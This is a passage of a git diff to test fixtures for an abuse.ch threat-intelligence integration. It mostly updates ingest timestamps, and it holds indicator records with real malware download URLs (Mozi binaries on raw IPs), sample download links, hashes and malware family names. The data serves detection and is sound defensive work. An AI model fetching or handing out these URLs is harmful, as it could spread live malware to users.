06:05:52\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKk:W5MT4WNaHy9P1FjbrjlKk\",\"tlsh\":\"6B54CF217A53C826F5E800FCA6E9878914167F346F44A4C773D40F6AA8759E2EF2B317\"}", "category": "threat", "type": "indicator", @@ -785,7 +785,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682514240Z", + "ingested": "2021-12-13T08:40:03.808131Z", "original": "{\"md5_hash\":\"e48e3fa5e0f7b21c1ecf1efc81ff91e8\",\"sha256_hash\":\"708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:51\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGo:X5DpBw/KViMTB1MnEWk0115Jj\",\"tlsh\":\"6644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -833,7 +833,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682519710Z", + "ingested": "2021-12-13T08:40:03.808142500Z", "original": "{\"md5_hash\":\"8957f5347633ab4b10c2ae4fb92c8572\",\"sha256_hash\":\"f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:05:50\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJy:0h3eZgRQCcw+MN54dEq7kqRtoLZM\",\"tlsh\":\"0754CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -879,7 +879,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682524519Z", + "ingested": "2021-12-13T08:40:03.808153800Z", "original": "{\"md5_hash\":\"09cc76b7077b4d5704e46e864575ff03\",\"sha256_hash\":\"94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:36\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Js\",\"tlsh\":\"BB44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -925,7 +925,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682529328Z", + "ingested": "2021-12-13T08:40:03.808172600Z", "original": "{\"md5_hash\":\"98a1cdf7de4232363f1d1e0f33dbfd99\",\"sha256_hash\":\"909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:16\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJQ:0h3eZgRQCcw+MN54dEq7kqRtoLZ+\",\"tlsh\":\"C554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -973,7 +973,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682533927Z", + "ingested": "2021-12-13T08:40:03.808282800Z", "original": "{\"md5_hash\":\"8a51830c1662513ba6bd44e2f7849547\",\"sha256_hash\":\"d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:05:15\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJh:0h3eZgRQCcw+MN54dEq7kqRtoLZ/\",\"tlsh\":\"1654CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -1019,7 +1019,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682538425Z", + "ingested": "2021-12-13T08:40:03.808295800Z", "original": "{\"md5_hash\":\"ae21d742a8118d6b86674aa5370bd6a7\",\"sha256_hash\":\"3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51\",\"file_type\":\"dll\",\"file_size\":\"280064\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:12\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKS:W5MT4WNaHy9P1FjbrjlKS\",\"tlsh\":\"5454CF217A53C826F5E800FCA6E9878925167F346F44A4C373D40F6AA8759E2DF2B317\"}", "category": "threat", "type": "indicator", @@ -1065,7 +1065,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682543024Z", + "ingested": "2021-12-13T08:40:03.808313200Z", "original": "{\"md5_hash\":\"78c9d88d24ed1d982a83216eed1590f6\",\"sha256_hash\":\"d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:04:38\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG8:X5DpBw/KViMTB1MnEWk0115Jr\",\"tlsh\":\"6044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -1111,7 +1111,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682547863Z", + "ingested": "2021-12-13T08:40:03.808326100Z", "original": "{\"md5_hash\":\"236577d5d83e2a8d08623a7a7f724188\",\"sha256_hash\":\"8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa\",\"file_type\":\"dll\",\"file_size\":\"241664\",\"signature\":null,\"firstseen\":\"2021-01-14 06:04:26\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa/\",\"virustotal\":null,\"imphash\":\"ed2860c18f5483e3b5388bad75169dc1\",\"ssdeep\":\"6144:X1G3WVIOY6Bdjehj+qudd96ou/6mv5wdC:X1GmSafShjYdd96z/6cwdC\",\"tlsh\":\"8D34BE41B28B8B4BD163163C2976D1F8953CFC909761CE693B64B22F0F739D0892E7A5\"}", "category": "threat", "type": "indicator", @@ -1157,7 +1157,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682552301Z", + "ingested": "2021-12-13T08:40:03.808337400Z", "original": "{\"md5_hash\":\"ff60107d82dcda7e6726d214528758e7\",\"sha256_hash\":\"fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:04:20\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGz:X5DpBw/KViMTB1MnEWk0115JU\",\"tlsh\":\"9244D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", diff --git a/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json b/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json index 6b9539a7503..4f40d0b8266 100644 --- a/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json +++ b/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json @@ -56,7 +56,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T06:08:07.516703193Z", + "ingested": "2021-12-13T08:40:06.442181300Z", "original": "{\"sha256_hash\":\"5bce7d528c1363104a93fbb5a7fa9bdd991ce929cc09cc7fb29052a68d4fd24b\",\"sha3_384_hash\":\"3b454eb6421d17d093f19292b64d30bf918cb91e9322d0e2d2512857997f574ea2ca5b005133c16f6c33c7cee9c1bd0e\",\"sha1_hash\":\"a71fd0504821092e003f350080a6bcc5fa6a972e\",\"md5_hash\":\"0af07660056a692b7cb82fa329221ddd\",\"first_seen\":\"2021-04-06 20:34:58\",\"last_seen\":null,\"file_name\":\"SALM0BRU.exe\",\"file_size\":399872,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"exe\",\"reporter\":\"James_inthe_box\",\"origin_country\":\"US\",\"anonymous\":0,\"signature\":null,\"imphash\":\"f34d5f2d4577ed6d9ceec516c1f5a744\",\"tlsh\":\"F9848B24AF932F9BC6CCC1FE50C2D165C9A9F85DD2B1251A73B6CB89FE00544ED2C686\",\"telfhash\":null,\"ssdeep\":\"3072:DsPPK3p+8r5igrL1Tq50cVBDmDJhE9yV4veedHrP6FXK7:D+PL8bronBDmDJ69JeedHriFG\",\"tags\":[\"exe\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"15\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", @@ -116,7 +116,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T06:08:07.516721888Z", + "ingested": "2021-12-13T08:40:06.442192600Z", "original": "{\"sha256_hash\":\"83d0429a2c5f1b611ebc30391eeeb75bebb51212ee1af51dbcf2624b48f9d27f\",\"sha3_384_hash\":\"0a1536add280715320040d5ac5340d3b205d90045ff5c90993b8e909edb9b3e9338b3ffbb3febcaf82584d00d516e8c7\",\"sha1_hash\":\"c454be4eb0892d61a4ad6bac16f97724e73cd795\",\"md5_hash\":\"296aad7075596d21516b30bfbc17fcac\",\"first_seen\":\"2021-04-06 20:32:25\",\"last_seen\":null,\"file_name\":\"PO_NO.ENQUIRY-210604.zip\",\"file_size\":476768,\"file_type_mime\":\"application/zip\",\"file_type\":\"zip\",\"reporter\":\"GovCERT_CH\",\"origin_country\":\"US\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"74A4233B9A6D5CA02B224AA69F37537D13A8406300944EAEFD375CA431583056B9F6FF\",\"telfhash\":null,\"ssdeep\":\"12288:j++y4mulTPaYJSaHwvJblQpLGwYeHU9vPpNGd+Zr:j3HPaMtQxblje01pNHZr\",\"tags\":null,\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"11\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", @@ -184,7 +184,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:07.516727138Z", + "ingested": "2021-12-13T08:40:06.442200600Z", "original": "{\"sha256_hash\":\"f4910ea08d14eeb634084de47cf590d4dc5e554552f111da20d22ae71d7b425b\",\"sha3_384_hash\":\"ee7586cb085fde3c14c9c1bea4635ccb30b1af2020f64e87a9983e61b05026ec9b35255670a3d9ecaab436c4ba302dcc\",\"sha1_hash\":\"bf103996196df8255881127dee103c22fc12bef3\",\"md5_hash\":\"a4838dd31c672122441bebcbf7e9d277\",\"first_seen\":\"2021-04-06 20:12:29\",\"last_seen\":null,\"file_name\":\"DropDll.dat\",\"file_size\":435926,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"dll\",\"reporter\":\"DmitriyMelikov\",\"origin_country\":\"DE\",\"anonymous\":0,\"signature\":\"Hancitor\",\"imphash\":\"0b5a952a025c2783c3126cdb9bef2844\",\"tlsh\":\"0C947D11BA96C473E572163008399F6A17BE7A900B704BDBE3CC097E4E755C24B36BA7\",\"telfhash\":null,\"ssdeep\":\"12288:L2X/txpFDEVkUNglTovKfoLy+hqK/cEUMMlGOG:RzglgLm/9lGOG\",\"tags\":[\"Hancitor\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"30\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", @@ -248,7 +248,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T06:08:07.516731396Z", + "ingested": "2021-12-13T08:40:06.442208500Z", "original": "{\"sha256_hash\":\"e45ffc61a85c2f5c0cbe9376ff215cad324bf14f925bf52ec0d2949f7d235a00\",\"sha3_384_hash\":\"788f61cf45bbc8cad5775de18d0d5f42c4e028af0aaa34c570645efc96af8ebc3d7fe330aaf22ef34d35360bbd4a708c\",\"sha1_hash\":\"a68ca1b41cb93fe2879bb3baeb8e19990758f099\",\"md5_hash\":\"8d7c8b55ac49d241fb7f75a27a5ef8d5\",\"first_seen\":\"2021-04-06 20:07:59\",\"last_seen\":null,\"file_name\":\"vabsheche.py\",\"file_size\":11717,\"file_type_mime\":\"text/x-script.python\",\"file_type\":\"unknown\",\"reporter\":\"ArkbirdDevil\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"AE3222515C6A881A03B3C66F7992B844FB588303C7116607F6FC86782F79568CAF1BBD\",\"telfhash\":null,\"ssdeep\":\"192:z7X/yHo/yz/yBKiSOINLyhQMYd+LiTfq6LTf3ZoTta3Grj6rg2:z7CIKnNNLwufPfAPq7\",\"tags\":[\"backdoor\",\"python\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"27\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", @@ -311,7 +311,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T06:08:07.516735173Z", + "ingested": "2021-12-13T08:40:06.442216400Z", "original": "{\"sha256_hash\":\"42f5f5474431738f91f612d9765b3fc9b85a547274ea64aa034298ad97ad28f4\",\"sha3_384_hash\":\"752e5d56a166227d06f8cbd40cd3f693f543f9c3f798c673c1430957bb7e149a12d9158138fa449479105f472e70f68f\",\"sha1_hash\":\"e8378aede9f26f09b7d503d79a05d67612be15f6\",\"md5_hash\":\"fe185f106730583156f39233f77f8019\",\"first_seen\":\"2021-04-06 20:00:48\",\"last_seen\":null,\"file_name\":\"42f5f5474431738f91f612d9765b3fc9b85a547274ea64aa034298ad97ad28f4.bin\",\"file_size\":7929856,\"file_type_mime\":\"application/msword\",\"file_type\":\"docx\",\"reporter\":\"ArkbirdDevil\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"13863341B085EE2EE2CA41BA0DA9C2BD43B63D131E054F677269B72D3EB76E0E7D4144\",\"telfhash\":null,\"ssdeep\":\"196608:KQaeKLOiBEp+uc+iuYmbMdHmN1Rwyd2jecXeaH1pHE+2:oeIOTp+p+iNJC1ChjhXZ1pHz2\",\"tags\":[\"maldoc\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"21\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", @@ -378,7 +378,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T06:08:07.516739090Z", + "ingested": "2021-12-13T08:40:06.442224300Z", "original": "{\"sha256_hash\":\"2d705f0b76f24a18e08163db2f187140ee9f03e43697a9ea0d840c829692d43c\",\"sha3_384_hash\":\"c82132559381b7b3b184b4ce8c7a58c301a46001621f346b637139f5987dee968ae2ef009a17b2388852b2db15a45b58\",\"sha1_hash\":\"b2da45913353bfc66d189455f9ad80ef26968143\",\"md5_hash\":\"70da6872b6b2da9ddc94d14b02302917\",\"first_seen\":\"2021-04-06 19:58:50\",\"last_seen\":null,\"file_name\":\"winlog.wll\",\"file_size\":131584,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"dll\",\"reporter\":\"ArkbirdDevil\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":null,\"imphash\":\"6476b7c4dd55eafbdf922a7ba1e2d5f9\",\"tlsh\":\"A2D38C067790C071DAAF013908799E624B7F7D70DDB49D8B77841A8E69342D0AF3AB27\",\"telfhash\":null,\"ssdeep\":\"1536:2NVi7z0r0lJRn6I8+YDgr1fnWG5Ff0+adgBYlCtMiQMX1c0E4JsWjcdonPv870E1:YM7zh8+Cofnp5eRm6riQ6OZoPv870E\",\"tags\":[\"apt\",\"tonto\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"30\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", @@ -438,7 +438,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T06:08:07.516742587Z", + "ingested": "2021-12-13T08:40:06.442232300Z", "original": "{\"sha256_hash\":\"30787f32adc487311d764b19d4504fdeab08c0d385e2fa065bd8d5836c031606\",\"sha3_384_hash\":\"a3ec981ed158fe08cc2cd97303807cfbed147e59ccfd92fcaa9395c5718b4d9b892d6e9fa6337f5976dc1bd042562fe4\",\"sha1_hash\":\"3d613d5678e43faeea1c636185a0b4c3ec80e742\",\"md5_hash\":\"de80e1d7d9f5b1c64ec9f8d4f5063989\",\"first_seen\":\"2021-04-06 19:58:44\",\"last_seen\":null,\"file_name\":\"30787f32adc487311d764b19d4504fdeab08c0d385e2fa065bd8d5836c031606.bin.sample\",\"file_size\":1088000,\"file_type_mime\":\"application/msword\",\"file_type\":\"docx\",\"reporter\":\"DmitriyMelikov\",\"origin_country\":\"DE\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"8635D001BA82C573D5621A35083ADBAA177E7D604F704ADBB3C83B2E5D355C14B32BA7\",\"telfhash\":null,\"ssdeep\":\"24576:WKEiZxl3A4yJJG2dPQQCthXzglgLm/9lGO:WKEGByvGOQQC/XElga/9lGO\",\"tags\":null,\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"32\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", @@ -510,7 +510,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:07.516745973Z", + "ingested": "2021-12-13T08:40:06.442240100Z", "original": "{\"sha256_hash\":\"84f983067868de50e5b1553782c056c1f5b5118bb2084473ca4b6908f221cd3b\",\"sha3_384_hash\":\"138dc28a74d15c1f9797ce732e99097c8c6db4549cb17cb7b20c1c6738a170328e45aea2d4c3b593912f14a97f521c1d\",\"sha1_hash\":\"00b52e8ca1785d5086703ad8cff1d28fc3354934\",\"md5_hash\":\"2759c73c986c6a757bf9d25621c5595a\",\"first_seen\":\"2021-04-06 19:52:32\",\"last_seen\":null,\"file_name\":\"Purchase Order.8000.scan.pdf...exe\",\"file_size\":752128,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"exe\",\"reporter\":\"James_inthe_box\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":\"SnakeKeylogger\",\"imphash\":\"f34d5f2d4577ed6d9ceec516c1f5a744\",\"tlsh\":\"23F4AE212684C9C0D93E67B4D43584F003BABD16D631F69F6E887C693EB32D2D63B646\",\"telfhash\":null,\"ssdeep\":\"12288:8t11ulRZRLZNh4YeX6f6XmwNShqE73YXy7moh:S11gZpZNmBX06WmAcy7m0\",\"tags\":[\"exe\",\"SnakeKeylogger\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"38\",\"uploads\":\"1\",\"mail\":{\"Generic\":\"low\"}}}", "category": "threat", "type": "indicator", @@ -582,7 +582,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:07.516749149Z", + "ingested": "2021-12-13T08:40:06.442248100Z", "original": "{\"sha256_hash\":\"0661d87116f44cbd5b5c6bec7fb06c4e5cd5b6ecbc5455d959e65f1ee46c54c8\",\"sha3_384_hash\":\"ed5d03454121d81adf65a01ba90af81b1a7cea052709c22bb9170508069d17242861f85e5546b2cc3efb07c10926368c\",\"sha1_hash\":\"a34fd5e57d75d17bc2d84055ca4752e5ee2e92f5\",\"md5_hash\":\"596b3dbf07a287dcf76860b5e54762c3\",\"first_seen\":\"2021-04-06 19:47:13\",\"last_seen\":null,\"file_name\":\"New Order PO#121012020_____PDF_______.exe\",\"file_size\":836096,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"exe\",\"reporter\":\"James_inthe_box\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":\"AgentTesla\",\"imphash\":\"f34d5f2d4577ed6d9ceec516c1f5a744\",\"tlsh\":\"A505CF712694C9A4FABD53B80434403007F5FE42E232FA9A6FD17C993E72782DA3B655\",\"telfhash\":null,\"ssdeep\":\"12288:qRedcNeqimzAEmN03VgdZfBOMx+RVBM7pdWje9ppB5nAZGNY2:ZaNeqikqN0udZfBFUYp55nFN\",\"tags\":[\"AgentTesla\",\"exe\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"40\",\"uploads\":\"1\",\"mail\":{\"Generic\":\"low\"}}}", "category": "threat", "type": "indicator", diff --git a/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log b/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log index e8099fa73aa..70200de40b7 100644 --- a/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log +++ b/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log @@ -1,56 +1,56 @@ -{"id":"961548","urlhaus_reference":"https://urlhaus.abuse.ch/url/961548/","url":"http://103.72.223.103:34613/Mozi.m","url_status":"online","host":"103.72.223.103","date_added":"2021-01-14 21:19:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} -{"id":"961546","urlhaus_reference":"https://urlhaus.abuse.ch/url/961546/","url":"http://112.30.97.184:44941/Mozi.m","url_status":"online","host":"112.30.97.184","date_added":"2021-01-14 21:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} -{"id":"961547","urlhaus_reference":"https://urlhaus.abuse.ch/url/961547/","url":"http://113.110.198.53:37173/Mozi.m","url_status":"online","host":"113.110.198.53","date_added":"2021-01-14 21:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} -{"id":"961545","urlhaus_reference":"https://urlhaus.abuse.ch/url/961545/","url":"http://101.20.183.170:47545/Mozi.m","url_status":"online","host":"101.20.183.170","date_added":"2021-01-14 21:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} -{"id":"961544","urlhaus_reference":"https://urlhaus.abuse.ch/url/961544/","url":"http://59.8.35.22:44782/Mozi.a","url_status":"online","host":"59.8.35.22","date_added":"2021-01-14 21:07:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961543","urlhaus_reference":"https://urlhaus.abuse.ch/url/961543/","url":"http://59.96.37.35:44359/Mozi.a","url_status":"online","host":"59.96.37.35","date_added":"2021-01-14 21:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961540","urlhaus_reference":"https://urlhaus.abuse.ch/url/961540/","url":"http://42.239.233.17:56507/Mozi.m","url_status":"online","host":"42.239.233.17","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961541","urlhaus_reference":"https://urlhaus.abuse.ch/url/961541/","url":"http://58.252.178.20:57562/Mozi.m","url_status":"online","host":"58.252.178.20","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961542","urlhaus_reference":"https://urlhaus.abuse.ch/url/961542/","url":"http://45.176.111.95:48845/Mozi.m","url_status":"online","host":"45.176.111.95","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961539","urlhaus_reference":"https://urlhaus.abuse.ch/url/961539/","url":"http://42.224.68.97:58245/Mozi.m","url_status":"online","host":"42.224.68.97","date_added":"2021-01-14 21:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961538","urlhaus_reference":"https://urlhaus.abuse.ch/url/961538/","url":"http://222.81.144.207:37198/Mozi.m","url_status":"online","host":"222.81.144.207","date_added":"2021-01-14 21:06:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961537","urlhaus_reference":"https://urlhaus.abuse.ch/url/961537/","url":"http://182.127.185.137:33524/Mozi.m","url_status":"online","host":"182.127.185.137","date_added":"2021-01-14 21:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961531","urlhaus_reference":"https://urlhaus.abuse.ch/url/961531/","url":"http://39.84.175.185:48261/Mozi.a","url_status":"online","host":"39.84.175.185","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961532","urlhaus_reference":"https://urlhaus.abuse.ch/url/961532/","url":"http://27.41.11.238:34478/Mozi.m","url_status":"online","host":"27.41.11.238","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961533","urlhaus_reference":"https://urlhaus.abuse.ch/url/961533/","url":"http://182.127.133.68:35703/Mozi.a","url_status":"online","host":"182.127.133.68","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961534","urlhaus_reference":"https://urlhaus.abuse.ch/url/961534/","url":"http://27.46.44.102:48666/Mozi.m","url_status":"online","host":"27.46.44.102","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961535","urlhaus_reference":"https://urlhaus.abuse.ch/url/961535/","url":"http://39.70.88.65:53923/Mozi.m","url_status":"online","host":"39.70.88.65","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 